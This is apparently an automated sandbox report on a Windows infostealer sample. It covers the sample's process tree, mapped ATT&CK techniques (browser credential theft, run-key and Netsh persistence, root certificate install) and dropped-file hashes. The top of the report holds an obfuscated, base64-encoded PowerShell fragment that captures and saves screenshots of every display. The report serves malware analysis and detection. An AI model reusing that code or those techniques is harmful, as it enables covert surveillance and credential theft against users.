HIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4180
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\232ccwlc\232ccwlc.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1316
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB100.tmp" "c:\Users\Admin\AppData\Local\Temp\232ccwlc\CSC972B2DA7A7EF4C4ABA652F97E9F62C8.TMP"
      4⤵
      PID:4912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
1⤵
PID:4928

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
b594c0a5591fab95a43185dd9944a231

SHA1
3d725e779790f3525ba12b0666f0a3a235644fed

SHA256
8478ca44e6145dbe6664f871852535793f5ab6d86b4c78c611165bdfb91f159a

SHA512
452fc6194d00c466a3ceb98d2cce2e4262f6b0998b99c6b2ccd842d07449b177d1ce9ff4e7659e0b358eedf44bdc20cc30e3fdb2e4b61e56d94e3965f48cdb73

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
01fff31a70e26012f37789b179059e32

SHA1
555b6f05cce7daf46920df1c01eb5c55dc62c9e6

SHA256
adf65afaf1c83572f05a99bf2ede8eb7be1aab0717d5254f501d5e09ba6f587b

SHA512
ac310c9bc5c1effc45e1e425972b09d1f961af216b50e1a504caa046b7f1a5f3179760e0b29591d83756ecb686d17a24770cf06fcea57e6f287ca5bbf6b6971b

Download Submit
C:\Users\Admin\AppData\Local\Temp\232ccwlc\232ccwlc.dll

Filesize
4KB

MD5
14deeedaa6da53c11a69abc8ec7558cf

SHA1
2c50f985301c82f61d043c9ddd62da733988f726

SHA256
7c836554ad2015c45f569ec3d131ff4fe984e53262fb4f661f390c0841c0318e

SHA512
9ff4a483b0ece9da053d1bccc6614db95734b77ecb2e06af756499aab41d865bc79dc8b0a48d78acb4adbd51d61c0d4aad55adbc1c5857a9bd60fad160031be1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB100.tmp

Filesize
1KB

MD5
22d1f69c319b95f49d787f6fa5e3e46a

SHA1
0376495c3881183c4e18bffac9655ce7a8d5abbd

SHA256
37c0605b3cef5e433fa777e4d8de8bc280924e1248f0a6af20a4d6e32de1e084

SHA512
c8c152c79976ca50e81f0b27a84ac78f5aa53eae3fc3fe8501613d6de66890c64f7c30b05cda98c7a27d5a5eec200f87b03df3cdacd7d1004d1a03478ec78406

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pcr21cbt.k3r.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\y1Jh5VcIF9\Display (1).png

Filesize
426KB

MD5
831dfe16c776a681074dbf349ae7ec46

SHA1
c3543e09fa38764dacdef8628499545ca6f115c0

SHA256
5d941eb0ed6e1a98a4beb1d78be22f593ecbf57f847e6594443aaf3accd7eb06

SHA512
edd64962e504a4b4caae677dcd8564e111e76afe324c72a7191e0c9d556e5d473c9aac04c0e998d5afc60e5ea08df6b6e4333a0c9d4b60fe7ded8d62390c6f40

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Filesize
10.3MB

MD5
3e58b3488744628bca8063ec01a6b361

SHA1
b9cdef6699826f272bc104f0b8d4acb782f7a71d

SHA256
b3be9f3bfcfa597bd30f7f9e52ef5b901491e84ae8bb2739006ef658be617891

SHA512
a12130cde4a4e6515981c1d5cb59e5f5be71c0023d2b8cf739d8ce170bf2b3fe2f3c945d7d22970ff9b7939ef67855f36c28bb00ca7080afce7a1ee808283992

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\232ccwlc\232ccwlc.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\232ccwlc\232ccwlc.cmdline

Filesize
607B

MD5
ab08b14be08c4b9294e299a258cd7c8a

SHA1
250ac90d8819e190408a3a4b9e9f41fcd23c65c2

SHA256
806aff21463e369e048bb08ad3aac25fbaf01ad9821f66fe9cb041872613c41b

SHA512
bb06c914dd2f8321e25632cb68bf171b34109f79b03e1a94cf165bf2bc4a1afadcc73ba5feff69c903cd62ce25ca6e1a9d5624a817d7527806bb4d9e1c0184e7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\232ccwlc\CSC972B2DA7A7EF4C4ABA652F97E9F62C8.TMP

Filesize
652B

MD5
1ecd7eb1c5a12089338e9e1b1645f001

SHA1
5d02c2548544bc1210bd8428d8b31dd9b817f1c6

SHA256
e5220f3d864b5cc63c8c9a6072931c8d3626fc382fed9a76cb82fa88cc0f8aba

SHA512
b0a6021690f69e1e5dddac0e3bd796abbe040d5028700dd80622beea518a3d400ecb206eddc8992661b3a9ef94812e1b092433da27155494638dfe10b461e3d4

Download Submit
memory/3736-23-0x00007FFCC4E10000-0x00007FFCC58D1000-memory.dmp

Filesize
10.8MB

Download
memory/3736-0-0x00007FFCC4E13000-0x00007FFCC4E15000-memory.dmp

Filesize
8KB

Download
memory/3736-12-0x00007FFCC4E10000-0x00007FFCC58D1000-memory.dmp

Filesize
10.8MB

Download
memory/3736-2-0x00007FFCC4E10000-0x00007FFCC58D1000-memory.dmp

Filesize
10.8MB

Download
memory/3736-1-0x00000221E1760000-0x00000221E1782000-memory.dmp

Filesize
136KB

Download
memory/4180-64-0x00000220CAB00000-0x00000220CAB08000-memory.dmp

Filesize
32KB

Download